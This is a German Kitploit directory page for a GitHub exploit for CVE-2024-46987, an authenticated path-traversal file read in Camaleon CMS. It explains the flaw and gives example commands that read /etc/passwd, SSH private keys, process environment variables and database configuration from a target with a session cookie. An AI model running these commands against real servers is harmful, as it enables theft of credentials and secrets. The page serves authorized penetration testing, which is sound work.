Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46987 — CVE-2024-46987 - Camaleon CMS LFI Exploit | Kitploit
Tools/GitHubGitHub/rival420/cve-2024-46987
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 - Camaleon CMS LFI Exploit

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46987 - Camaleon CMS Lokale Dateieinbindung

Exploit für authentifizierte lokale Dateieinbindung (LFI) für Camaleon CMS.

Sicherheitslücke

Camaleon CMS ist anfällig für einen authentifizierten LFI-Angriff über den Endpunkt /admin/media/download_private_file. Der Parameter file wird nicht ordnungsgemäß bereinigt, was einen Pfad-Traversal ermöglicht, um beliebige Dateien vom Server zu lesen.

Betroffene Versionen

  • Camaleon CMS < 2.8.2

Voraussetzungen

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
# Print file to terminal (default)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Save to file
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

Parameter

Beispiele

root@kitploit:~
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Verwenden Sie es nur gegen Systeme, für die Sie ausdrückliche Berechtigung zum Testen haben.

Referenzen

  • CVE-2024-46987
  • Camaleon CMS
Tool herunterladen
ParameterBeschreibung
-u, --urlZiel-URL
-f, --fileZu lesende Datei (z. B. /etc/passwd)
-t, --tokenauth_token-Cookie-Wert
-o, --outputAusgabedateiname (optional, wird sonst im Terminal ausgegeben)